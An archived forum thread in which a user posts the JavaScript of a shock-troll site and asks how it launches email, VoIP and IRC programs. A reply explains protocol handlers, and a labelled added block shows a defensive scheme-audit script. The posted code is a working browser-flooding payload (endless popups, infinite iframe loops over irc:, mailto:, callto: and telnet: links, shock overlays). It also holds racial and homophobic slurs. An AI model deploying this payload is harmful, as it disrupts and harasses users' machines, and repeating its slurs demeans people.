
What Does This Do?



Guest FirefoxRocks

Since a forum was hacked, I got sent an email with a link to a very dangerous website. Since it crashed my computer, I decided to investigate the JavaScript safely. I viewed the source through the W3C validator and this is what it came up with:

Source URL: http://validator.w3.org/check?uri=http://r...Validator/1.654
Actual Page URL: http://rules.on.nimp.org/

WARNING! The JavaScript code below is very dangerous.

    function altf4key() {
        if (event.keyCode == 18 || event.keyCode == 115)
            alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately");
    }
    function ctrlkey() {
        if (event.keyCode == 17)
            alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately");
    }
    function delkey() {
        if (event.keyCode == 46)
            alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the ######? That guy's ###### is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n");
    }
    var nom = navigator.appName.toLowerCase();
    var agt = navigator.userAgent.toLowerCase();
    var is_major = parseInt(navigator.appVersion);
    var is_minor = parseFloat(navigator.appVersion);
    var is_ie = (agt.indexOf("msie") != -1);
    var is_ie4up = (is_ie && (is_major >= 4));
    var is_nav = (nom.indexOf('netscape')!=-1);
    var is_nav4 = (is_nav && (is_major == 4));
    var is_mac = (agt.indexOf("mac")!=-1);
    var is_gecko = (agt.indexOf('gecko') != -1);
    // GECKO REVISION
    var is_rev = 0
    if (is_gecko) {
        temp = agt.split("rv:")
        is_rev = parseFloat(temp[1])
    }
    function procreate() {
        for(i = 0; i < 16; i++) {
            popUp("index.php?popup=1");
        }
    }
    function popUp(URL) {
        day = new Date();
        id = day.getTime();
        eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");
    }
    goatseflash = '<div id="hello" style="z-index: 50; position: fixed; top: 0px; left: 0px; width: 100%; height: 100%;">';
    goatseflash += ' <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="100%" height="100%">';
    goatseflash += ' <param name="movie" value="http://static.nimp.org/flash/hello.swf" />'
    goatseflash += ' <param name="wmode" value="transparent" />';
    goatseflash += ' </object>'
    goatseflash += '</div>';
    function load_goatse() {
        document.body.innerHTML += goatseflash;
        setTimeout("unload_goatse()", 3000); // 3s
    }
    function unload_goatse() {
        document.getElementById("hello").style.display = 'none';
    }
    var protos = [
        "http://static.nimp.org/lm.pdf",
        "http://static.nimp.org/jews.wmv",
        "irc://irc.gnaa.us/gnaa",
        "irc://irc.efnet.org/politics",
        "news:alt.flame.niggers",
        "news:alt.flame.faggots",
        "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us",
        "callto://JOIN_THE_GNAA__2005_RECRUITMENT_DRIVE",
        "aim:GoIM?screenname=Gary_Niger&message=HY+LOL+HY+LOL",
        "rlogin://1.1.1.1:80",
        "telnet://1.1.1.1:80",
        "aim:addbuddy?listofscreennames=HY,LOL,HY,LOL,HY,LOL,join,the,gnaa,2006,RECRUITMENT,DRIVE,heartiez2incog&groupname=gnaa",
        "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us",
        "ed2k://|file|Gayniggers From Outer Space [GNAA Digitally Remastered].avi|134174720|F8AF9D8A7091CD7A7B8968C9EB397C02|/",
    ];
    function add(str) {
        div = document.getElementById('goatse');
        div.innerHTML = '<iframe style="width: 1; height: 1;" src="' + str + '"></iframe>';
    }
    function ruin() {
        document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>';
        while (1) {
            for (i = 0; i < protos.length; i++) {
                add(protos[i]);
            }
        }
    }

This code can open Skype, Telnet, Windows Live Mail, Thunderbird (or any email clients) and endless amounts of popup windows. Even if Skype and Telnet aren't directly opened (Firefox and Chrome prompt you to "Launch application" like several million times), Windows Live Mail AND Thunderbird are opened. Since the CPU is dedicated to the browser and wlmail.exe/thunderbird.exe, Windows Task Manager is very slow to respond if you can manage to kill the browser and the email clients.

I've also heard this can open IRC clients but I don't have any installed thank goodness. Also, AVG detected a virus when the page loaded.

Now I see that alert boxes are created onkeypress with the first 3 functions, and some stuff is being written into the innerHTML of some stuff, but how does this JavaScript launch VoIP, email and IRC software?!

Link to comment

It just calls the associated pseudo-protocols, e.g. irc: (IRC), mailto: (email), callto: (VoIP), telnet: (Telnet), etc. This isn't technically dangerous unless in your haste to close everything you click "send", then their spam is sent.

Link to comment
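The pseudo-protocol behaviour described in the reply can be reviewed without loading the page. The example below is added here and is not part of any post in this thread: it groups the URL literals in a script by scheme, separating those the browser renders from those handed to an external application, and shows an allowlist check for frame or popup URLs. The function names, the sample array and the example.invalid hosts are constructed for illustration.

```javascript
// Added example: offline triage of a suspicious script's URL literals.
// Schemes the browser renders itself; any other scheme is passed to
// whatever application the OS has registered for it.
const WEB_SCHEMES = new Set(["http", "https"]);

// Collect quoted string literals of the form "scheme:rest".
function extractUrlLiterals(source) {
  const literal = /(["'])([a-z][a-z0-9+.-]*:[^"'\s]*)\1/gi;
  return Array.from(source.matchAll(literal), (m) => m[2]);
}

// Group the literals by scheme so a reviewer sees which handlers would fire.
function auditSchemes(source) {
  const report = { web: [], external: Object.create(null) };
  for (const url of extractUrlLiterals(source)) {
    const scheme = url.slice(0, url.indexOf(":")).toLowerCase();
    if (WEB_SCHEMES.has(scheme)) {
      report.web.push(url);
    } else {
      if (!report.external[scheme]) report.external[scheme] = [];
      report.external[scheme].push(url);
    }
  }
  return report;
}

// Allowlist a site can apply before using untrusted input as a frame or popup URL.
function isAllowedFrameSrc(candidate, base = "https://forum.example.invalid/") {
  try {
    const { protocol } = new URL(candidate, base);
    return protocol === "http:" || protocol === "https:";
  } catch {
    return false; // unparseable input is rejected
  }
}

// Constructed sample shaped like the protos array in the post (placeholder hosts).
const SAMPLE = `var protos = [
  "http://files.example.invalid/doc.pdf",
  "irc://chat.example.invalid/room",
  "mailto:user@example.invalid?subject=hello",
  "callto://example_user",
  "telnet://192.0.2.1:80",
  "mailto:other@example.invalid"
];`;

console.log(auditSchemes(SAMPLE));
```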

Guest FirefoxRocks

Well actually it is dangerous because with VoIP, it automatically places a call somewhere. And it overloads the CPU because the browser opens many things repeatedly. With Firefox/Chrome, you can cancel "Launch application" (except for email). But with innerHTML, how does it automatically click the link?

Link to comment

Archived

This topic is now archived and is closed to further replies.
